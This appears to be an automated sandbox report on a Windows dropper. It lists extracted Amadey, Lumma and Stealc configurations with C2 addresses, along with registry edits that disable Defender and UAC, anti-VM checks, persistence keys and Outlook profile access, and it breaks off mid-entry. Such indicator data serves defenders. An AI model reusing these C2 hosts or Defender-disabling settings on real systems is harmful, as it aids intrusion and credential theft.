Analysis
-
max time kernel
118s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-12-2024 15:44
Static task
static1
General
-
Target
8f76aedb3b40874e7da7e95d77eeedeb75c4ea4c56e9ccc2a5f2d8a25cf32b76.exe
-
Size
6.9MB
-
MD5
f2474893219774b9f2ca9e0b2a364167
-
SHA1
4ad3d06b0c2d73d1b2e8690aed9a1d34be8605ef
-
SHA256
8f76aedb3b40874e7da7e95d77eeedeb75c4ea4c56e9ccc2a5f2d8a25cf32b76
-
SHA512
d81269dcd4cc38159805df982889ceb9884c8a3cb358c987e0c767d9678058a32f62fe17aca09934883711bd617a1c12a5f05e1b637b2220457bd4a9e3c6b316
-
SSDEEP
196608:seffYNtIxjY2k7yDFISApTapLKlOsTrMuy6EV/Wr3a:sEqtINY/CFQpa2zTYuuV/
Malware Config
Extracted
http://176.113.115.178/GO.png
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://sordid-snaked.cyou/api
https://awake-weaves.cyou/api
https://wrathful-jammy.cyou/api
https://debonairnukk.xyz/api
https://diffuculttan.xyz/api
https://effecterectz.xyz/api
https://deafeninggeh.biz/api
https://immureprech.biz/api
https://tacitglibbr.biz/api
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
amadey
5.10
03013e
http://185.11.61.104
-
install_dir
0d7d65a8fb
-
install_file
Gxtuum.exe
-
strings_key
6a02c43bc60cba83349fcb51d95a69ff
-
url_paths
/7jbBdsS/index.php
Extracted
lumma
https://tacitglibbr.biz/api
https://immureprech.biz/api
https://deafeninggeh.biz/api
https://drive-connect.cyou/api
Signatures
-
Amadey family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 4r428k.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 4r428k.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 1081e922e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 1081e922e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 1081e922e8.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 4r428k.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 4r428k.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 4r428k.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 1081e922e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 1081e922e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 4r428k.exe -
Stealc family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3P57p.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9b9b5d2450.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1081e922e8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1M25e4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2Z2786.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4r428k.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a6938fd3d4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 46 1632 powershell.exe 85 4392 powershell.exe -
pid Process 1632 powershell.exe 3376 powershell.exe 2616 powershell.exe 2280 powershell.exe 6380 powershell.exe 3304 powershell.exe 4392 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1M25e4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2Z2786.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9b9b5d2450.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LB311.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2Z2786.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3P57p.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a6938fd3d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4r428k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LB311.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1081e922e8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1081e922e8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1M25e4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3P57p.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4r428k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a6938fd3d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9b9b5d2450.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation 1M25e4.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation b3bb9917a2.exe -
Executes dropped EXE 21 IoCs
pid Process 860 Y6L36.exe 2856 d1l76.exe 3632 1M25e4.exe 1584 skotes.exe 2152 2Z2786.exe 3128 3P57p.exe 2848 4r428k.exe 428 a6938fd3d4.exe 1996 skotes.exe 5708 9b9b5d2450.exe 3652 e08cedcd1e.exe 4764 1081e922e8.exe 4824 17f49b7a2a.exe 5752 LB311.exe 6940 skotes.exe 464 Mig.exe 5688 b3bb9917a2.exe 6332 86ec224ca6.exe 1928 86ec224ca6.exe 764 7z.exe 1948 e713b60588.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 2Z2786.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 3P57p.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine a6938fd3d4.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 9b9b5d2450.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 1M25e4.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 4r428k.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 1081e922e8.exe -
Loads dropped DLL 1 IoCs
pid Process 764 7z.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 4r428k.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4r428k.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 1081e922e8.exe -
Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" d1l76.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a6938fd3d4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1015233001\\a6938fd3d4.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9b9b5d2450.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1015234001\\9b9b5d2450.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e08cedcd1e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1015235001\\e08cedcd1e.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1081e922e8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1015236001\\1081e922e8.exe" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 8f76aedb3b40874e7da7e95d77eeedeb75c4ea4c56e9ccc2a5f2d8a25cf32b76.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" Y6L36.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5700 powercfg.exe 1568 powercfg.exe 4516 powercfg.exe 4232 powercfg.exe 1948 powercfg.exe 3284 powercfg.exe 1948 powercfg.exe 4448 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000023cb4-7329.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe LB311.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe Mig.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 3632 1M25e4.exe 1584 skotes.exe 2152 2Z2786.exe 3128 3P57p.exe 2848 4r428k.exe 428 a6938fd3d4.exe 1996 skotes.exe 5708 9b9b5d2450.exe 4764 1081e922e8.exe 6940 skotes.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 1632 set thread context of 1496 1632 powershell.exe 103 PID 3376 set thread context of 1908 3376 powershell.exe 115 PID 2616 set thread context of 1072 2616 powershell.exe 120 PID 5752 set thread context of 3736 5752 LB311.exe 182 PID 464 set thread context of 2156 464 Mig.exe 214 PID 464 set thread context of 1876 464 Mig.exe 215 PID 464 set thread context of 5956 464 Mig.exe 220 PID 6332 set thread context of 1928 6332 86ec224ca6.exe 228 -
resource yara_rule behavioral1/memory/6828-9926-0x00007FF603650000-0x00007FF603AE0000-memory.dmp upx behavioral1/memory/6828-10010-0x00007FF603650000-0x00007FF603AE0000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1M25e4.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2044 sc.exe 4528 sc.exe 2856 sc.exe 4832 sc.exe 4448 sc.exe 5644 sc.exe 3684 sc.exe 5468 sc.exe 1432 sc.exe 5820 sc.exe 2792 sc.exe 5164 sc.exe 4972 sc.exe 4380 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5964 1948 WerFault.exe 230 -
System Location Discovery: System Language Discovery 1 TTPs 40 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y6L36.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 86ec224ca6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1081e922e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 86ec224ca6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage e08cedcd1e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b3bb9917a2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8f76aedb3b40874e7da7e95d77eeedeb75c4ea4c56e9ccc2a5f2d8a25cf32b76.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4r428k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d1l76.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2Z2786.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9b9b5d2450.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e713b60588.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1M25e4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a6938fd3d4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e08cedcd1e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language e08cedcd1e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3P57p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmstp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 17f49b7a2a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5244 powershell.exe 6116 PING.EXE -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried 